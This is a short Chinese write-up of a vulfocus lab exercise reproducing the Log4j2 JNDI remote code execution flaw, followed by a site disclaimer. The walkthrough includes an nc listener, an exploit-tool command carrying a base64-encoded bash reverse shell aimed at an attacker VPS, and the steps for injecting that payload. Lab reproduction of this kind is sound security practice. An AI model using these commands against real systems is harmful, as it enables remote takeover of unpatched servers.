记一次vulfocus靶场log4j2命令执行漏洞复现


1、docker拉漏洞环境

docker pull vulfocus/log4j2-rce-2021-12-09:latest

2、然后运行环境

docker run -p   8080:8080 -d --name log4j2-rce   vulfocus/log4j2-rce-2021-12-09

3、然后去访问vps8080端口出现springboot,按照官方说的漏洞位置在/hello,漏洞变量是payload

4、bp抓包,改为POST测试

5、vps开启nc

nc -lvvp 7777

6、使用github工具进行反弹shell

https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar  -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcCUuMjQuOTUuMi83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"  -A   [vps ip]

这里将反弹shell命令进行了base64编码

base64编码地址

https://www.jackson-t.ca/runtime-exec-payloads.html

jar生成的payload放入hello中的payload

反弹shell成功

 

7、最后用http://vulfocus.fofa.so/ 靶场复测了一下,成功反弹拿到flag

 

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM